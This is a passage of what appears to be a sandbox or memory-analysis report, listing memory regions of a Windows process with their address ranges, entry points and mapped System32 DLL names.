name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 1057
start_va = 0x7ffa0ac50000
end_va = 0x7ffa0ac59fff
monitored = 0
entry_point = 0x7ffa0ac514c0
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1058
start_va = 0x7ffa0afc0000
end_va = 0x7ffa0afd1fff
monitored = 0
entry_point = 0x7ffa0afc3580
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 1059
start_va = 0x7ffa0b050000
end_va = 0x7ffa0b06afff
monitored = 0
entry_point = 0x7ffa0b051040
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 1060
start_va = 0x7ffa0b300000
end_va = 0x7ffa0b314fff
monitored = 0
entry_point = 0x7ffa0b302dc0
region_type = mapped_file
name = "ondemandconnroutehelper.dll"
filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")
Region:
id = 1061
start_va = 0x7ffa0b320000
end_va = 0x7ffa0b32dfff
monitored = 0
entry_point = 0x7ffa0b321460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1062
start_va = 0x7ffa0b330000
end_va = 0x7ffa0b33bfff
monitored = 0
entry_point = 0x7ffa0b332830
region_type = mapped_file
name = "bi.dll"
filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll")
Region:
id = 1063
start_va = 0x7ffa0b340000
end_va = 0x7ffa0b34ffff
monitored = 0
entry_point = 0x7ffa0b341700
region_type = mapped_file
name = "proximityservicepal.dll"
filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")
Region:
id = 1064
start_va = 0x7ffa0b350000
end_va = 0x7ffa0b358fff
monitored = 0
entry_point = 0x7ffa0b351ed0
region_type = mapped_file
name = "proximitycommonpal.dll"
filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")
Region:
id = 1065
start_va = 0x7ffa0b360000
end_va = 0x7ffa0b38cfff
monitored = 0
entry_point = 0x7ffa0b362290
region_type = mapped_file
name = "proximitycommon.dll"
filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")
Region:
id = 1066
start_va = 0x7ffa0b390000
end_va = 0x7ffa0b3e1fff
monitored = 0
entry_point = 0x7ffa0b3938e0
region_type = mapped_file
name = "proximityservice.dll"
filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")
Region:
id = 1067
start_va = 0x7ffa0b4a0000
end_va = 0x7ffa0b4b4fff
monitored = 0
entry_point = 0x7ffa0b4a3460
region_type = mapped_file
name = "ssdpapi.dll"
filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")
Region:
id = 1068
start_va = 0x7ffa0b4c0000
end_va = 0x7ffa0b559fff
monitored = 0
entry_point = 0x7ffa0b4dada0
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 1069
start_va = 0x7ffa0b640000
end_va = 0x7ffa0b6a6fff
monitored = 0
entry_point = 0x7ffa0b6463e0
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1070
start_va = 0x7ffa0b730000
end_va = 0x7ffa0b74efff
monitored = 0
entry_point = 0x7ffa0b734960
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 1071
start_va = 0x7ffa0b7a0000
end_va = 0x7ffa0b7aafff
monitored = 0
entry_point = 0x7ffa0b7a1d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1072
start_va = 0x7ffa0b800000
end_va = 0x7ffa0b8bffff
monitored = 0
entry_point = 0x7ffa0b82fd20
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 1073
start_va = 0x7ffa0b9f0000
end_va = 0x7ffa0ba09fff
monitored = 0
entry_point = 0x7ffa0b9f2430
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1074
start_va = 0x7ffa0ba10000
end_va = 0x7ffa0ba25fff
monitored = 0
entry_point = 0x7ffa0ba119f0
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1075
start_va = 0x7ffa0baf0000
end_va = 0x7ffa0bb27fff
monitored = 0
entry_point = 0x7ffa0bb08cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1076
start_va = 0x7ffa0bbe0000
end_va = 0x7ffa0bc8dfff
monitored = 0
entry_point = 0x7ffa0bbf80c0
region_type = mapped_file
name = "windows.networking.connectivity.dll"
filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll")
Region:
id = 1077
start_va = 0x7ffa0bc90000
end_va = 0x7ffa0bca1fff
monitored = 0
entry_point = 0x7ffa0bc99260
region_type = mapped_file
name = "rilproxy.dll"
filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll")
Region:
id = 1078
start_va = 0x7ffa0bcb0000
end_va = 0x7ffa0bd60fff
monitored = 0
entry_point = 0x7ffa0bd288b0
region_type = mapped_file
name = "cellularapi.dll"
filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll")
Region:
id = 1079
start_va = 0x7ffa0bd70000
end_va = 0x7ffa0bd83fff
monitored = 0
entry_point = 0x7ffa0bd72d50
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1080
start_va = 0x7ffa0c070000
end_va = 0x7ffa0c102fff
monitored = 0
entry_point = 0x7ffa0c079680
region_type = mapped_file
name = "msvcp_win.dll"
filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll")
Region:
id = 1081
start_va = 0x7ffa0c2b0000
end_va = 0x7ffa0c2d4fff
monitored = 0
entry_point = 0x7ffa0c2c2f20
region_type = mapped_file
name = "wificonnapi.dll"
filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll")
Region:
id = 1082
start_va = 0x7ffa0c2e0000
end_va = 0x7ffa0c2f0fff
monitored = 0
entry_point = 0x7ffa0c2e7ea0
region_type = mapped_file
name = "dcpapi.dll"
filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll")
Region:
id = 1083
start_va = 0x7ffa0c300000
end_va = 0x7ffa0c318fff
monitored = 0
entry_point = 0x7ffa0c304520
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 1084
start_va = 0x7ffa0ca80000
end_va = 0x7ffa0ca99fff
monitored = 0
entry_point = 0x7ffa0ca82cf0
region_type = mapped_file
name = "locationpelegacywinlocation.dll"
filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll")
Region:
id = 1085
start_va = 0x7ffa0ce40000
end_va = 0x7ffa0d1c1fff
monitored = 0
entry_point = 0x7ffa0ce91220
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1086
start_va = 0x7ffa0e2c0000
end_va = 0x7ffa0e3cdfff
monitored = 0
entry_point = 0x7ffa0e30eaa0
region_type = mapped_file
name = "mrmcorer.dll"
filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll")
Region:
id = 1087
start_va = 0x7ffa0e440000
end_va = 0x7ffa0e457fff
monitored = 0
entry_point = 0x7ffa0e441b10
region_type = mapped_file
name = "locationframeworkinternalps.dll"
filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll")
Region:
id = 1088
start_va = 0x7ffa0e6d0000
end_va = 0x7ffa0e724fff
monitored = 0
entry_point = 0x7ffa0e6d3fb0
region_type = mapped_file
name = "policymanager.dll"
filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")
Region:
id = 1089
start_va = 0x7ffa0e730000
end_va = 0x7ffa0e766fff
monitored = 0
entry_point = 0x7ffa0e736020
region_type = mapped_file
name = "gnssadapter.dll"
filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll")
Region:
id = 1090
start_va = 0x7ffa0e770000
end_va = 0x7ffa0e78ffff
monitored = 0
entry_point = 0x7ffa0e7739a0
region_type = mapped_file
name = "locationwinpalmisc.dll"
filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll")
Region:
id = 1091
start_va = 0x7ffa0e790000
end_va = 0x7ffa0e7a6fff
monitored = 0
entry_point = 0x7ffa0e795630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1092
start_va = 0x7ffa0e7b0000
end_va = 0x7ffa0e7c2fff
monitored = 0
entry_point = 0x7ffa0e7b57f0
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 1093
start_va = 0x7ffa0e7d0000
end_va = 0x7ffa0e849fff
monitored = 0
entry_point = 0x7ffa0e7f7630
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1094
start_va = 0x7ffa0e850000
end_va = 0x7ffa0e87dfff
monitored = 0
entry_point = 0x7ffa0e857550
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 1095
start_va = 0x7ffa0e880000
end_va = 0x7ffa0e895fff
monitored = 0
entry_point = 0x7ffa0e881b60
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1096
start_va = 0x7ffa0e8a0000
end_va = 0x7ffa0e903fff
monitored = 0
entry_point = 0x7ffa0e8b5ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1097
start_va = 0x7ffa0ead0000
end_va = 0x7ffa0eb10fff
monitored = 0
entry_point = 0x7ffa0ead4840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 1098
start_va = 0x7ffa0eb20000
end_va = 0x7ffa0eb2bfff
monitored = 0
entry_point = 0x7ffa0eb214d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 1099
start_va = 0x7ffa0eb30000
end_va = 0x7ffa0ec65fff
monitored = 0
entry_point = 0x7ffa0eb5f350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 1100
start_va = 0x7ffa0ec70000
end_va = 0x7ffa0ed55fff
monitored = 0
entry_point = 0x7ffa0ec8cf10
region_type = mapped_file
name = "usermgr.dll"
filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")
Region:
id = 1101
start_va = 0x7ffa0ed60000
end_va = 0x7ffa0ee27fff
monitored = 0
entry_point = 0x7ffa0eda13f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1102
start_va = 0x7ffa0ee30000
end_va = 0x7ffa0ee90fff
monitored = 0
entry_point = 0x7ffa0ee34b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 1103
start_va = 0x7ffa0eea0000
end_va = 0x7ffa0f01bfff
monitored = 0
entry_point = 0x7ffa0eef1650
region_type = mapped_file
name = "locationframework.dll"
filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll")
Region:
id = 1104
start_va = 0x7ffa0f020000
end_va = 0x7ffa0f02afff
monitored = 0
entry_point = 0x7ffa0f021770
region_type = mapped_file
name = "lfsvc.dll"
filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll")
Region:
id = 1105
start_va = 0x7ffa0f030000
end_va = 0x7ffa0f06dfff
monitored = 0
entry_point = 0x7ffa0f03a050
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1106
start_va = 0x7ffa0f070000
end_va = 0x7ffa0f096fff
monitored = 0
entry_point = 0x7ffa0f073bf0
region_type = mapped_file
name = "profsvcext.dll"
filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")
Region:
id = 1107
start_va = 0x7ffa0f0a0000
end_va = 0x7ffa0f0e9fff
monitored = 0
entry_point = 0x7ffa0f0aac30
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 1108
start_va = 0x7ffa0f0f0000
end_va = 0x7ffa0f144fff
monitored = 0
entry_point = 0x7ffa0f0ffc00
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 1109
start_va = 0x7ffa0f190000
end_va = 0x7ffa0f221fff
monitored = 0
entry_point = 0x7ffa0f1da780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 1110
start_va = 0x7ffa0f2b0000
end_va = 0x7ffa0f2bcfff
monitored = 0
entry_point = 0x7ffa0f2b1420
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 1111
start_va = 0x7ffa0f2d0000
end_va = 0x7ffa0f2dffff
monitored = 0
entry_point = 0x7ffa0f2d2c60
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 1112
start_va = 0x7ffa0f2e0000
end_va = 0x7ffa0f2ecfff
monitored = 0
entry_point = 0x7ffa0f2e2ca0
region_type = mapped_file
name = "csystemeventsbrokerclient.dll"
filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")
Region:
id = 1113
start_va = 0x7ffa0f2f0000
end_va = 0x7ffa0f31efff
monitored = 0
entry_point = 0x7ffa0f2f8910
region_type = mapped_file
name = "wptaskscheduler.dll"
filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")
Region:
id = 1114
start_va = 0x7ffa0f370000
end_va = 0x7ffa0f3ddfff
monitored = 0
entry_point = 0x7ffa0f377f60
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 1115
start_va = 0x7ffa0f3e0000
end_va = 0x7ffa0f3f0fff
monitored = 0
entry_point = 0x7ffa0f3e3320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1116
start_va = 0x7ffa0f430000
end_va = 0x7ffa0f465fff
monitored = 0
entry_point = 0x7ffa0f440070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1117
start_va = 0x7ffa0fc30000
end_va = 0x7ffa0fc70fff
monitored = 0
entry_point = 0x7ffa0fc47eb0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 1118
start_va = 0x7ffa0fc80000
end_va = 0x7ffa0fd7bfff
monitored = 0
entry_point = 0x7ffa0fcb6df0
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 1119
start_va = 0x7ffa0fe10000
end_va = 0x7ffa0fecefff
monitored = 0
entry_point = 0x7ffa0fe31c50
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 1120
start_va = 0x7ffa0ff20000
end_va = 0x7ffa0ff29fff
monitored = 0
entry_point = 0x7ffa0ff21660
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1121
start_va = 0x7ffa0ff30000
end_va = 0x7ffa0ff47fff
monitored = 0
entry_point = 0x7ffa0ff35910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1122
start_va = 0x7ffa0ff50000
end_va = 0x7ffa1009cfff
monitored = 0
entry_point = 0x7ffa0ff93da0
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 1123
start_va = 0x7ffa10cc0000
end_va = 0x7ffa11152fff
monitored = 0
entry_point = 0x7ffa10ccf760
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 1124
start_va = 0x7ffa11160000
end_va = 0x7ffa111c6fff
monitored = 0
entry_point = 0x7ffa1117e710
region_type = mapped_file
name = "bcp47langs.dll"
filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll")
Region:
id = 1125
start_va = 0x7ffa11220000
end_va = 0x7ffa113a5fff
monitored = 0
entry_point = 0x7ffa1126d700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1126
start_va = 0x7ffa113b0000
end_va = 0x7ffa113cbfff
monitored = 0
entry_point = 0x7ffa113b37a0
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 1127
start_va = 0x7ffa11410000
end_va = 0x7ffa11422fff
monitored = 0
entry_point = 0x7ffa11412760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1128
start_va = 0x7ffa114c0000
end_va = 0x7ffa114c9fff
monitored = 0
entry_point = 0x7ffa114c1350
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1129
start_va = 0x7ffa11550000
end_va = 0x7ffa1155afff
monitored = 0
entry_point = 0x7ffa11551de0
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 1130
start_va = 0x7ffa11560000
end_va = 0x7ffa1157cfff
monitored = 0
entry_point = 0x7ffa11564f60
region_type = mapped_file
name = "appinfo.dll"
filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll")
Region:
id = 1131
start_va = 0x7ffa11580000
end_va = 0x7ffa115f8fff
monitored = 0
entry_point = 0x7ffa1159fb90
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 1132
start_va = 0x7ffa11600000
end_va = 0x7ffa11607fff
monitored = 0
entry_point = 0x7ffa116013e0
region_type = mapped_file
name = "dabapi.dll"
filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")
Region:
id = 1133
start_va = 0x7ffa11640000
end_va = 0x7ffa1167ffff
monitored = 0
entry_point = 0x7ffa11651960
region_type = mapped_file
name = "brokerlib.dll"
filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll")
Region:
id = 1134
start_va = 0x7ffa117d0000
end_va = 0x7ffa117f6fff
monitored = 0
entry_point = 0x7ffa117d7940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1135
start_va = 0x7ffa11800000
end_va = 0x7ffa118a9fff
monitored = 0
entry_point = 0x7ffa11827910
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1136
start_va = 0x7ffa118b0000
end_va = 0x7ffa119affff
monitored = 0
entry_point = 0x7ffa118f0f80
region_type = mapped_file
name = "twinapi.appcore.dll"
filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll")
Region:
id = 1137
start_va = 0x7ffa11a40000
end_va = 0x7ffa11a4bfff
monitored = 0
entry_point = 0x7ffa11a42480
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 1138
start_va = 0x7ffa11b10000
end_va = 0x7ffa11b41fff
monitored = 0
entry_point = 0x7ffa11b22340
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 1139
start_va = 0x7ffa11d80000
end_va = 0x7ffa11d8bfff
monitored = 0
entry_point = 0x7ffa11d82790
region_type = mapped_file
name = "hid.dll"
filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")
Region:
id = 1140
start_va = 0x7ffa11d90000
end_va = 0x7ffa11db3fff
monitored = 0
entry_point = 0x7ffa11d93260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1141
start_va = 0x7ffa11f30000
end_va = 0x7ffa12023fff
monitored = 0
entry_point = 0x7ffa11f3a960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 1142
start_va = 0x7ffa12080000
end_va = 0x7ffa120c8fff
monitored = 0
entry_point = 0x7ffa1208a090
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 1143
start_va = 0x7ffa121a0000
end_va = 0x7ffa121abfff
monitored = 0
entry_point = 0x7ffa121a27e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1144
start_va = 0x7ffa12280000
end_va = 0x7ffa122b0fff
monitored = 0
entry_point = 0x7ffa12287d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1145
start_va = 0x7ffa122e0000
end_va = 0x7ffa12359fff
monitored = 0
entry_point = 0x7ffa12301a50
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 1146
start_va = 0x7ffa123a0000
end_va = 0x7ffa123d3fff
monitored = 0
entry_point = 0x7ffa123bae70
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1147
start_va = 0x7ffa123e0000
end_va = 0x7ffa123e9fff
monitored = 0
entry_point = 0x7ffa123e1830
region_type = mapped_file
name = "dpapi.dll"
filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")
Region:
id = 1148
start_va = 0x7ffa124f0000
end_va = 0x7ffa1250efff
monitored = 0
entry_point = 0x7ffa124f5d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1149
start_va = 0x7ffa12660000
end_va = 0x7ffa126bbfff
monitored = 0
entry_point = 0x7ffa12676f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1150
start_va = 0x7ffa12710000
end_va = 0x7ffa12726fff
monitored = 0
entry_point = 0x7ffa127179d0
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1151
start_va = 0x7ffa12830000
end_va = 0x7ffa1283afff
monitored = 0
entry_point = 0x7ffa128319a0
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1152
start_va = 0x7ffa12870000
end_va = 0x7ffa12890fff
monitored = 0
entry_point = 0x7ffa12880250
region_type = mapped_file
name = "joinutil.dll"
filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")
Region:
id = 1153
start_va = 0x7ffa128c0000
end_va = 0x7ffa128f9fff
monitored = 0
entry_point = 0x7ffa128c8d20
region_type = mapped_file
name = "ntasn1.dll"
filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")
Region:
id = 1154
start_va = 0x7ffa12900000
end_va = 0x7ffa12926fff
monitored = 0
entry_point = 0x7ffa12910aa0
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 1155
start_va = 0x7ffa12a10000
end_va = 0x7ffa12a3cfff
monitored = 0
entry_point = 0x7ffa12a29d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1156
start_va = 0x7ffa12ba0000
end_va = 0x7ffa12bf5fff
monitored = 0
entry_point = 0x7ffa12bb0bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1157
start_va = 0x7ffa12c00000
end_va = 0x7ffa12c18fff
monitored = 0
entry_point = 0x7ffa12c05e10
region_type = mapped_file
name = "eventaggregation.dll"
filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")
Region:
id = 1158
start_va = 0x7ffa12c20000
end_va = 0x7ffa12c48fff
monitored = 0
entry_point = 0x7ffa12c34530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1159
start_va = 0x7ffa12c50000
end_va = 0x7ffa12ce8fff
monitored = 0
entry_point = 0x7ffa12c7f4e0
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1160
